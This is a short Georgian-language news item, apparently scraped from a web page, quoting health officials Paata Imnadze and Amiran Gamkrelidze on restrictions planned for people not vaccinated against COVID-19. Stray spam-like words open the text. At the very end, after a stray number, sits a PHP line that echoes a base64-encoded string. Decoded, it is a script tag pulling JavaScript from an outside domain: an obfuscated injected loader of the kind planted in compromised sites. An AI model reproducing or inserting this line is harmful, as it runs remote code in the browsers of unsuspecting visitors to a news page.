celsiusi
ავერსი შნაიდერი
რეგულაციების ამოქმედება განიხილება აუცრელი ადამიანებისთვის, - ამის შესახებ, რადიო მაესტროს „სატელეფონო ინტერვიუში“, დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის მოადგილემ, პაატა იმნაძემ რეგულაციების სავარაუდო დაწესებაზე კომენტირებისას განაცხადა.
 
"მოსახელობასთან შეხვედრები მაქვს, პედაგოგებთან,  სამედიცინო პერსონატლთან,  მოსწავლეებთან, ძალიან ბევრი ადამიანი ამბობს, რომ გარკვეული რეგულაციები უნდა დაწესდეს, იმისთვის, რომ მეტი ადამიანი აიცრას. ეს არის ჩვეულებრივი მიდგომა ევროპულ, აზირუ ქვეყნებში, ასევე შეერთებულ შტატებში, აცრილები რომლებიც გაცილებით უსაფრთხო არიან, როგორც თავისთავისთვის, ასევე გარშემო მყოფთათვის, მეტი თავისუფლება ჰქონდეთ ასეთ ადამიანებს, იმათთან შედარებით, ვინც საფრთხეს წარმოადგენს პირველ რიგში, თავისთავისთვის და შემდეგ გარშემომყოფთათვის.  რეგულაციის ამოქმედება განიხილება არაცრილი ადამიანებისთვის, იქნება ეს რესტორანი, თუ სპორტულ შეჯიბრზე დასწრება," - განაცხადა პაატა იმნაძემ. 
 
შეგახსენებთ, რომ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის ამირან გამყრელიძის შეფასებით, არსებული ეპიდვითარების გათვალისწინებით, საიმედო პროგნოზი არ არის და ხისტი გადაწყვეტილებებია საჭირო. მისივე თქმით, საკოოდინაციო საბჭოს დღევანდელ სხდომაზე გაიცა დავალება, რომ გარკვეული გადაწყვეტილებების თაობაზე პაკეტი მომზადდეს.
2887
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");